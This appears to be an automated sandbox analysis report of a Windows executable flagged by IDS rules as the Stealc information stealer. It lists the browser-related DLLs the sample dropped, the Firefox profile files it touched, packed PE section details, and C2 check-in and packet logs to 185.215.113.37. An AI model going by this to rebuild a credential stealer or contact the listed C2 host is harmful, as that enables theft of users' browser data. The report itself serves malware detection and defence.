Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.944766050829037
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'840'128 bytes
MD5:	7c9061299e31179207d11e7c9790ee0b
SHA1:	44bca72cd503143c705e91bf1d8a378e56ba65c1
SHA256:	d23559eacee8397368f036a9eb559fbe679827d8639f25da0a08791a2df6b3d5
SHA512:	3f481a5e0758dfb868f9b00f2fe161d52cbffb9cd11c05601e293a7ab021ca2b0e1c3fa24bca76460dfb706f3b62f0844c083df1b8a004732455f1a01dced1a2
SSDEEP:	49152:MO2m4fxwTuR+BcAIfxEdXobGJLJ+1hsCaP4SFcZ3e:FNGWq++xE+KJLohSaZ3
TLSH:	5E8533E7A0ABA4FBDD9FCC7D47C2E4642EB82C60E4750C9463CC52E6D45B4500A66CEB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xa92000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F5344BDA62Ah
pslld mm3, qword ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax*4], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	bbddc6629be0b0a7e3b68ffd251eb1c6	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x297000	0x200	ff1d75b6031a6328ad46cd101de05bf7	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
atrdupqr	0x4f5000	0x19c000	0x19b200	9754268bf872fc660434a3a5f0f28f61	False	0.9947546509197325	data	7.952671489318633	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ycfcddne	0x691000	0x1000	0x400	69fd321e39d0c1724b93d96a1ee1d43d	False	0.763671875	data	6.041457612591448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x692000	0x3000	0x2200	09725c2b927ef233d6f3c61fc9b4b0be	False	0.061810661764705885	DOS executable (COM)	0.7307668587221211	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-10T18:23:08.897672+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49731	185.215.113.37	80	TCP
2024-10-10T18:23:09.126964+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49731	185.215.113.37	80	TCP
2024-10-10T18:23:09.132778+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.4	49731	TCP
2024-10-10T18:23:09.351959+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49731	185.215.113.37	80	TCP
2024-10-10T18:23:09.359068+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.4	49731	TCP
2024-10-10T18:23:10.357868+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49731	185.215.113.37	80	TCP
2024-10-10T18:23:10.841831+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49731	185.215.113.37	80	TCP
2024-10-10T18:23:16.265647+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49731	185.215.113.37	80	TCP
2024-10-10T18:23:17.317143+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49731	185.215.113.37	80	TCP
2024-10-10T18:23:18.051589+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49731	185.215.113.37	80	TCP
2024-10-10T18:23:18.634073+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49731	185.215.113.37	80	TCP
2024-10-10T18:23:20.637508+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49731	185.215.113.37	80	TCP
2024-10-10T18:23:21.291886+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49731	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 10, 2024 18:23:07.886028051 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:07.920077085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:07.920186043 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:07.920428038 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:07.925193071 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:08.631506920 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:08.631563902 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:08.659864902 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:08.665169001 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:08.897592068 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:08.897671938 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:08.898857117 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:08.904028893 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:09.126895905 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:09.126914978 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:09.126964092 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:09.127990961 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:09.132777929 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:09.351902962 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:09.351958990 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:09.352044106 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:09.352061033 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:09.352088928 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:09.352101088 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:09.352197886 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:09.352214098 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:09.352229118 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:09.352243900 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:09.352243900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:09.352252007 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:09.352268934 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:09.352289915 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:09.353522062 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:09.359067917 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:09.577011108 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:09.577136993 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:09.593193054 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:09.593246937 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:09.598078966 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:09.598135948 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:09.598167896 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:09.598195076 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:09.598325968 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:09.598561049 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.357717991 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.357867956 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.578896046 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.585083961 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.841716051 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.841767073 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.841779947 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.841830969 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.841866016 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.841873884 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.841912985 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.842171907 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.842288017 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.842300892 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.842389107 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.842396021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.842452049 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.843144894 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.843281984 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.843333006 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.963968992 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.964018106 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.964024067 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.964059114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.964178085 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.964207888 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.964281082 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.964324951 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.965037107 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.965136051 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.965141058 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.965152025 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.965159893 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.965187073 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.965374947 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.965420008 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.965449095 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.965455055 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.965471983 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.965500116 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.965524912 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.966011047 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.966037035 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.966042042 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.966074944 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.966146946 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.966155052 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.966200113 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.966927052 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.966974020 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.966976881 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.966980934 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.967020988 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.967103004 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.967108965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.967155933 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:10.967879057 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:10.967978954 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:11.088393927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:11.088424921 CEST	80	49731	185.215.113.37	192.168.2.4
